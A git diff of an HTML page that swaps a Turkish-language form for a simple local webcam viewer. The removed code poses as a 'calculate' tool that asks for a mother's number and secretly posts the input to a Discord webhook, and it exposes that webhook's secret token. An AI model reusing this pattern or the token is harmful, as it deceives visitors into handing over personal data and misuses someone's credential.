--- a/index.html
+++ b/index.html
@@ -1,11 +1,9 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Annenin Numarası</title>
+    <title>Webcam Viewer</title>
     <style>
         body {
-            margin: 0;
-            padding: 0;
             display: flex;
             justify-content: center;
             align-items: center;
@@ -20,32 +18,16 @@
             padding: 20px;
             border-radius: 10px;
             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
-            animation: fadeIn 0.5s ease;
-        }
-
-        @keyframes fadeIn {
-            from {
-                opacity: 0;
-                transform: translateY(-20px);
-            }
-            to {
-                opacity: 1;
-                transform: translateY(0);
-            }
+            text-align: center;
         }
 
         h1 {
-            text-align: center;
             margin-bottom: 20px;
         }
 
-        .textbox {
+        video {
             width: 100%;
-            padding: 10px;
-            border: 1px solid #ccc;
             border-radius: 5px;
-            margin-bottom: 10px;
-            font-size: 16px;
         }
 
         .button {
@@ -68,35 +50,30 @@
 </head>
 <body>
     <div class="container">
-        <h1>Annenin Numarası Paran Kaç Paran Var</h1>
-        <input type="text" id="textbox" class="textbox" placeholder="numara" />
-        <button onclick="sendToWebhook()" class="button">hesapla</button>
+        <h1>Webcam Viewer</h1>
+        <video id="videoElement"></video>
+        <button onclick="startWebcam()" class="button">sa</button>
     </div>
 
     <script>
-        function sendToWebhook() {
-            var textboxValue = document.getElementById('textbox').value;
-            var webhookUrl = 'https://discord.com/api/webhooks/1121844315912675471/VjLDnpl_fcoT-nRlnd3tZRccCGs2WjLLeO58pAV44ahavR2u53DVTaOr_NlMyQM1yjWL'; // Replace with your actual webhook URL
+        function startWebcam() {
+            // Get the video element
+            var videoElement = document.getElementById('videoElement');
 
-            // Create a new XMLHttpRequest object
-            var xhr = new XMLHttpRequest();
-
-            // Prepare the webhook request
-            xhr.open('POST', webhookUrl);
-            xhr.setRequestHeader('Content-Type', 'application/json');
-
-            // Prepare the payload data
-            var payload = {
-                text: textboxValue
-            };
-
-            // Convert payload to JSON string
-            var payloadString = JSON.stringify(payload);
-
-            // Send the webhook request with the payload data
-            xhr.send(payloadString);
-
-            alert('Mesajınız başarıyla gönderildi!');
+            // Check if the browser supports the getUserMedia API
+            if (navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
+                // Request permission to access the webcam
+                navigator.mediaDevices.getUserMedia({ video: true })
+                    .then(function(stream) {
+                        // Set the stream as the video element's source
+                        videoElement.srcObject = stream;
+                    })
+                    .catch(function(error) {
+                        console.log('Failed to access the webcam: ' + error);
+                    });
+            } else {
+                console.log('getUserMedia is not supported by this browser.');
+            }
         }
     </script>
 </body>
